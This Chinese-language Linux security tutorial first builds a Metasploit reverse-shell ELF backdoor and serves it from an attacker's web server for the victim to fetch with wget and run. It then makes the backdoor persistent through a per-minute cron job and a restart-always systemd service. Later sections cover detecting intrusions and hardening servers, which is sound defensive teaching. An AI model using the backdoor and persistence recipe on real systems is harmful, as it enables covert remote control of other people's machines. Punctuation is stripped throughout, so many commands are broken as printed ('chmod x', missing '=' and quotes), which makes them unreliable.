)
一、Linux 木马入侵实战从制作到持久化控制学到这里我们正式进入远程控制与持久化环节这是渗透测试中最核心的后门技术之一也是理解服务器安全风险的关键。1. 木马制作Metasploit 生成 Linux 后门Kali Linux 内置的MSFMetasploit是生成与控制木马的标准工具本次使用反向 TCP 木马让受害机主动连接攻击机突破防火墙限制。生成木马命令msfvenom -p linux/x64/shell/reverse_tcp LHOST攻击机IP LPORT端口 -f elf -o shell.elf启动监听msfconsole use exploit/multi/handler set payload linux/x64/shell/reverse_tcp set lhost 攻击机IP set lport 端口 run2. 木马植入让目标下载并运行攻击机开启 Apache 服务service apache2 start把木马放到网页目录mv shell.elf /var/www/html受害机下载木马wget http://攻击机IP/shell.elf -O shell.elf关键添加执行权限chmod x shell.elf运行上线./shell.elf重点Linux 文件必须有x 执行权限才能运行这也是权限防护的核心点。3. 持久化控制开机自启永不掉线单次运行容易被发现攻击者会用计划任务、系统服务实现持久化。1计划任务 Cron定时运行查看crontab -l编辑crontab -e每分钟执行木马* * * * * /shell.elf2系统服务 Systemd最强持久化创建服务文件/etc/systemd/system/test.service[Unit] Descriptiontest Afternetwork.target [Service] Typesimple ExecStart/shell.elf Restartalways [Install] WantedBymulti-user.target加载并开机自启systemctl daemon-reload systemctl start test.service systemctl enable test.service三者区别启动项开机一次运行计划任务定时重复运行系统服务崩溃自动重启最隐蔽、最稳定二、Linux 入侵检测快速揪出木马与后门学会攻击更要学会防守排查。这部分是运维与安全工程师的核心技能能快速定位异常入侵。1. 日志排查找到入侵痕迹Linux 最重要的两个日志系统日志/var/log/syslog登录认证日志/var/log/auth.logSSH 爆破全在这里常用排查命令# 实时看系统日志 tail -f /var/log/syslog # 看SSH失败登录 journalctl -u ssh | grep Failed password # 看SSH成功登录 journalctl -u ssh | grep Accepted password2. 可疑账户排查后门用户是最常见入侵痕迹必须定期检查# 查看所有UID0的超级用户正常只有root awk -F: $30{print $1} /etc/passwd # 查看有sudo权限的用户 grep -v ^# /etc/sudoers | grep ALL处理异常用户强制下线pkill -KILL -u 用户名禁用用户usermod -L 用户名删除用户userdel -r 用户名3. 进程与网络连接排查# 看所有进程 ps -ef # 实时看资源找挖矿木马 top # 看网络连接找外连IP ss -ntap netstat -ntulnp异常特征陌生外连 IPCPU / 内存长期 100%不知名程序占用端口4. 计划任务与启动项排查# 查看所有用户计划任务 crontab -l -u root crontab -l -u 其他用户 # 查看开机启动项 ls /etc/init.d/ systemctl list-unit-files --typeservice --stateenabled三、Linux 系统安全加固从源头挡住攻击检测是事后加固才是事前防御。以下是企业级通用加固方案简单有效。1. 账户与 SSH 加固禁止 root 远程登录最重要nano /etc/ssh/sshd_config PermitRootLogin no PasswordAuthentication no # 尽量用密钥登录 systemctl restart sshd删除无用 / 陌生用户所有用户设置强密码2. 防火墙加固Ubuntuufwufw enable ufw allow 22/tcp ufw allow 80/tcp ufw default deny incoming ufw statusCentOSfirewalldsystemctl start firewalld systemctl enable firewalld firewall-cmd --permanent --add-port22/tcp firewall-cmd --reload3. 系统与权限加固定期更新系统# Ubuntu apt update apt upgrade -y # CentOS yum update -y最小权限原则重要目录权限chmod 700 /root不随意使用chmod 777、rm -rf关闭不必要开机自启服务4. 审计监控安装 auditd 监控关键命令apt install auditd systemctl start auditd auditctl -w /usr/sbin/useradd -p x -k useradd_exec